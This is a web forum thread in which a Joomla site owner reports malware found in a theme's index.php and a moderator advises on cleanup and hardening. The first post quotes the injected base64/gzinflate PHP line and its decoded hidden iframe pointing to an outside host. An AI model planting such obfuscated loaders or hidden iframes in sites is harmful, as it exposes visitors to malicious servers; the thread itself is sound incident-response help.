
Malware In Tachyon Somehow

    • Dom2012
    • Jr. Rocketeer
    • Posts: 39
    • Thanks: 0

    Malware In Tachyon Somehow

    Posted 12 years 10 months ago
    • Hi,

      While exploring the cause of a problem in another third party component, another company found some code in Tachyon's index.php file.

      I don't believe for one second that Rockettheme put it there, but what I cannot figure out is how it is there.

      Here's what they found/said:-
      /templates/rt_tachyon_j16/index.php line 19
      echo(gzinflate(base64_decode("3Y5BDsIgEEX3TXoHMpvqpkQXLhTwEl4AKYUxFBo6tXp7qfUUzurn5/0/n7H/ODGZjCMxeo9WAtkX8Yd+6s0FVVddMvNgI7VLRrK7RmCf9WDZlI0ETzSeOd/oKeCA1GLsE8fYGofXwwlYLLSE24JENgMrbAoBo5OgZ0rAvnX3lDubJcRi6IAuSjDl6RrwFp0nCUdgC3bkV6UE32aoZn+pK/FboD4=")));

      This line of code is translated into a script tag:
      <script type="text/javascript">document.write('<iframe src="scriptslimit.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script>

      They could not find any evidence that another component/plugin had injected it, but that seems the most likely case to me. I wondered if anyone here could somehow help me track down the cause so that I can 'expose' the culprit who made this happen.

      Thanks.
    • Cliff Pfeifer
    • Preeminent Rocketeer
    • Posts: 8444
    • Thanks: 20
    • Website Developer

    Re: Malware In Tachyon Somehow

    Posted 12 years 10 months ago
    • Sorry for the trouble, basically you got hacked. The code itself doesn't tell you much other than someone got into your site and placed it there. This is a pretty common hacker technique, they get into your files, usually through an outdated plugin or old version of Joomla, and place code on the index file of your theme to redirect or take over your site completely. This seems pretty tame compared to a few others I've come across to be honest, but it's something to be concerned about.

      You can patch this up right away by uploading a fresh copy of the index.php file from the theme download, but you have a security issue - and that's the problem you need to fix. I would check server logs for around the time you started having issues, to see if you can determine how they got in - look for modified files, any unauthorized FTP activity. It might indicate which files they used to get access. Make sure you are using the most recent versions of all plugins, extensions and most importantly Joomla.

      Keep an eye on it, they'll usually strike again if you don't fix the hole in your security. And even if you do, they might try to find another way in. Hackers are persistent. If it continues to be an issue, look into Akeeba Admin Tools as an extra security measure, that usually stops it. Outdated software is the most frequent cause of this so keep everything up to date as much as possible.
    • The difficult we do immediately, the impossible takes a little longer.
    • Dom2012
    • Jr. Rocketeer
    • Posts: 39
    • Thanks: 0

    Re: Malware In Tachyon Somehow

    Posted 12 years 10 months ago
    • Thanks for your reply, Cliff.

      I did as you suggested and the site works fine now.

      I was a bit surprised by this because I have OSE Anti hacker installed. I thought it was meant to prevent something like this.

      It looks like I need to do some homework so this won't happen again.

      If you've any tips about reading material, I'd be pleased to know.

      Many thanks,
      Dom
    • Cliff Pfeifer
    • Preeminent Rocketeer
    • Posts: 8444
    • Thanks: 20
    • Website Developer

    Re: Malware In Tachyon Somehow

    Posted 12 years 10 months ago
    • Honestly, I only know about it because it's happened to me a bunch of times, some of mine were exactly like yours, others were far worse. I went back and forth with a hacker for a few months on a client's site before I finally figured out what the cause was - outdated plugin - then locked everything down tight so it wouldn't happen again.

      It's really just about keeping everything up to date - especially Joomla, minimize the number of plugins you use if possible, as each one is a security risk if not kept updated. Outdated software is the number one cause of hacking. You just can't give them an easy way in.

      I can't recommend Akeeba Admin Tools enough. There is a free version that works great for locking down your admin area, the paid version is very cheap (a couple bucks) and it allows you to prevent these types of minor attacks and more serious threats. Since I started using that, I haven't had one issue.
    • The difficult we do immediately, the impossible takes a little longer.
